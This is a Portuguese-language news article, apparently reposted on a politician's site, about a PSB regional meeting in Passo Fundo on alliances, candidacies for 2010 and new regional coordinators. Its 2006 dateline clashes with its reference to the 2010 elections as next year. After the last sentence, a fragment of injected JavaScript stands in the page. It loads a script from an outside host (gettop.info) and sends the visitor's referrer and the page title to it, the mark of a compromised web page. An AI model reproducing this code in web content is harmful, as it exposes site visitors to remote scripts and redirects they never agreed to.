PSB: o partido promoveu no sábado um encontro regional em Passo Fundo.
- Posted by: Ass. Imprensa
- Posted in Beto na Mídia
- Tags:
O Nacional – Passo Fundo, 25/05/2006
Redação ON
O PSB realizou nesse sábado um encontro regional do partido em Passo Fundo. Os socialistas reuniram-se no centro de eventos do Sest/Senat para integrar uma série de reuniões que a legenda está fazendo para implementar as coordenadorias regionais do PSB e debater as questões que permeiam as eleições 2010, como a política de alianças, a construção de nominatas, a candidatura majoritária e a organização do partido, que deve acompanhar e dar sustentação a projetos mais ousados eleitorais e de crescimento.
O PSB dividiu o partido em 16 regiões e está centralizando os encontros regionais. Passo Foi sede da 13ª reunião. O presidente estadual do PSB, Caleb Oliveira, justificou o porquê. "Temos eleições no Brasil a cada dois anos. Assim nos anos ímpares, quando não há eleição, é a oportunidade que os partidos têm para se voltar mais para a formação política e a discussão interna. Evidentemente que não se deixa falar de eleição."
Para Caleb, a legenda tem como tarefa para o ano que vem ampliar as bancadas. Assim, nos encontros, estão sendo estimuladas as candidaturas regionais. O líder partidário também revelou que o PSB tem um projeto de formação política muito forte. "A Fundação João Mangabeira elaborou um processo de formação, e nós vamos dar muita força para isso no segundo semestre", contou.
O presidente do diretório municipal, Marcos Cittolin, enfatizou que "o PSB tem feito uma mobilização no Rio Grande do Sul porque há uma tendência muito forte de termos uma candidatura própria ao governo do estado. Hoje temos o nosso maior líder [Beto Albuquerque] como pré-candidato a governador. Assim o PSB não pode tomar essa decisão de forma unilateral, de cima para baixo, isso está sendo construído a partir desses encontros".
Em todos os encontros regionais já realizados no estado pelo PSB gaúcho, e em Passo Fundo não foi diferente, as principais manifestações estão delineando como vontade dos socialistas que Beto Albuquerque concorra ao governo do Rio Grande do Sul em 2010.
Coordenadoria regional
Ao final do encontro foram escolhidos os coordenadores regionais do PSB. Integram essa coordenadoria: Rubem Cima, de Soledade; Luis Renato, de Tapera; Dina Lima da Silva, de Ernestina; Fernando Müller, de Passo Fundo; Delmar Zambiazi, de Pontão, e Oldemar Raimondi, de Ronda Alta.
O coordenador de Passo Fundo, Fernando Müller, explica que "a implementação das coordenadorias regionais é fruto do amadurecimento político do partido, elas terão como desafio aumentar a representatividade na Assembleia Legislativa, manter o espaço na Câmara dos Deputados e conduzir o deputado federal Beto Albuquerque ao governo do estado".s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;